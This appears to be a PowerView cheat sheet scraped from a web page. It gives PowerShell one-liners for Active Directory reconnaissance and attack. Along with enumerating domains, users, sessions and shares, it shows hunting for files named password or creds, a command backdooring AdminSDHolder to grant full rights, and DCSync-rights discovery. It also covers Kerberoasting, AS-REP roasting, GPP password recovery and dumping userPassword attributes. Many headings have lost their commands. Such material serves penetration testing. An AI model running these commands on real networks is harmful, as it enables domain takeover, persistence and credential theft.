PowerView
Load, help, and creds - Import PowerView into the current session.
- Show detailed help for a function. - Build an alternate credential object for any PowerView function.$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a',$SecPassword)
Domain, forest, DCs, sites - Query info about the current domain.
- Query info about a specified (child) domain. - List domain controllers for the current domain. - Get forest-level information. - List all domains in the forest. - List forest trusts. - List domain trusts (like nltest /trusted_domains). - Recursively map reachable domain trusts. - Enumerate AD sites. - Enumerate AD subnets. - List global catalog servers in the forest.Policy (password/Kerberos) - Read Kerberos policy from domain policy.
- Read password/lockout policy (SystemAccess) from domain policy.Users (filters, UAC, SPN/AS-REP) - Enumerate users with useful props (UPN, enabled, last logon).
- Users with passwords not changed in >1 year.$Date=(Get-Date).AddYears(-1).ToFileTime(); Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
'S-1-5-21-890171859-3433809279-3366196753-1114','CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
Groups and membership - List groups with βadminβ in the name.
- List protected (AdminSDHolder) groups. - List groups that donβt have a global scope. - List all groups a user/group effectively belongs to (tokenGroups). - Same as above with a DN identity. - Recursively enumerate group members of Domain Admins.Foreign users/groups (cross-domain) - Find users from foreign domains present in this domain.
- Find groups in target domain that have foreign members. - List foreignSecurityPrincipals from the GC (for SID/DN correlation).Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://corp.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)'
Computers (targeting, delegation) - Inventory computers with helpful props.
- Filter by OS for servers. - Computers allowing unconstrained delegation. - Computers trusted to authenticate for others (constrained delegation). - Computers with specific SPNs (e.g., SQL). - List computers from a specific OU.Sessions, local groups, shares (who/where, not process list) - Enumerate SMB sessions on a remote host.
- Enumerate logged-on users on a host. - Enumerate current RDP sessions (and source IPs). - List local groups on a host. - List members of a local group (default WinNT provider). - Faster local group member enumeration via Win32 API. - Enumerate shares on a host.User hunting (old Invoke-UserHunter) - Show all user locations across domain (be noisy).
- Focus on unconstrained delegation computers and show users. - Hunt for admin users who allow delegation on unconstrained hosts. - Hunt specific user and check if you have local admin where found. - Get logged-on users for all βserverβ OUs in a domain.Get-DomainOU -Identity *server* -Domain corp.local | % { Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | % { Get-NetLoggedOn -ComputerName $_.dnshostname } }
Shares and file discovery - Enumerate open shares domain-wide.
- Enumerate only shares you can read. - Search domain shares for interesting files (old Invoke-FileFinder). - Same, with alternate credentials.$Password="PASSWORD"|ConvertTo-SecureString -AsPlainText -Force; $Credential=New-Object System.Management.Automation.PSCredential("CORP\user",$Password); Find-InterestingDomainShareFile -Domain CORP -Credential $Credential
Find-InterestingFile -Path \\SERVER\Share -Include password,creds,secret -OfficeDocs -LastAccessTime (Get-Date).AddDays(-7)
GPOs, GP links, access mapping - List all GPOs in the domain.
- List OUs and their GPO links. - List policies applied to a specific computer. - Map where a user/group has local group rights via GPO (old Find-GPOLocation). - Check RDP group mapping for a user in a domain. - Export a CSV of GPO mappings with flattened computer arrays.Get-DomainGPOUserLocalGroupMapping | % { $_.computers = ($_.computers -join ", "); $_ } | Export-Csv -NoTypeInformation gpo_map.csv
Delegation reconnaissance - Users with constrained delegation configured.
- Computers with constrained delegation configured. - Admin-protected users who are allowed to be delegated (interesting).ACLs, DCSync rights, AdminSDHolder, backdooring - Enumerate who has rights over a target object (resolve GUIDs).
- Grant βwillβ the right to reset βmattββs password. - Read AdminSDHolder permissions (resolve GUIDs). - Backdoor AdminSDHolder to grant βmattβ full rights to protected objects.Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') }
GPP and GPP-linked computers - Recover any stored Group Policy Preferences passwords (legacy).
- Resolve all computer DNS hostnames where a given GPP/GPO applies by GUID.Get-DomainOU -GPLink '<GPP_GUID>' | % { Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname }
Interesting ACLs and shadow admins - Find interesting domain ACLs (write/owner/DACL rights) and resolve GUIDs.
- Flag GPOs where βuserβ SIDs (>1000) have modification/control rights.Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') }
OU, file servers, DNS - List organizational units.
- Find likely file servers based on user home/profile/script paths. - Enumerate DNS records for a zone (if DNS partition accessible).Trust-aware foreign membership walk - Pull foreignSecurityPrincipal DNs from GC for later correlation.
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
$Domains=@{}; ForEach($ForeignUser in $ForeignUsers){ $ForeignUserDomain=$ForeignUser.Substring($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'; if(-not $Domains[$ForeignUserDomain]){ $Domains[$ForeignUserDomain]=$True; $Filter="(|(member="+($ForeignUsers -join ")(member=")+"))"; Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member } } | fl
User impersonation helpers (STA) - Temporarily impersonate a different credential (runas /netonly-like).
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a',$SecPassword); Invoke-UserImpersonation -Credential $Cred
Object outliers, setters, ownership - Detect outlier properties across computer objects.
- Set arbitrary attributes on an AD object. - Take or set ownership of an AD object.Kerberoasting and AS-REP roast - Kerberoast using defaults (prints TGS hashes).
- Kerberoast a specific account, Hashcat format. - Kerberoast scoped to a specific OU/SearchBase. - List AS-REP roastable users (no preauth). - Request AS-REP roast for a specific user.Local admin reachability - Threaded probe to find where youβre local admin (SMB/RPC).
- Test admin access to a single host.Turn short names into FQDNs via GC - Resolve bare hostnames to FQDNs using the global catalog.
gc .\computers.txt | % { Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_) " -Properties dnshostname }
Data export/import - Export objects to XML for offline analysis.
- Re-import exported PowerView objects.Password attribute probe (rare, but occasionally exposed) - Dump userPassword attribute (if present) and render ASCII.
$FormatEnumerationLimit=-1; Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % { Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru } | fl
Common pipelines and counts - Count total domain users quickly.
- Find non-empty user description fields.Process enumeration (not a PowerView function) PowerView 3.x has no Get-NetProcess; use native remoting/WMI/CIM: - Get processes on a remote host via WinRM (PowerShell remoting).
- Query processes via CIM (WSMan) on a remote host. - Query processes via legacy WMI (DCOM) on a remote host.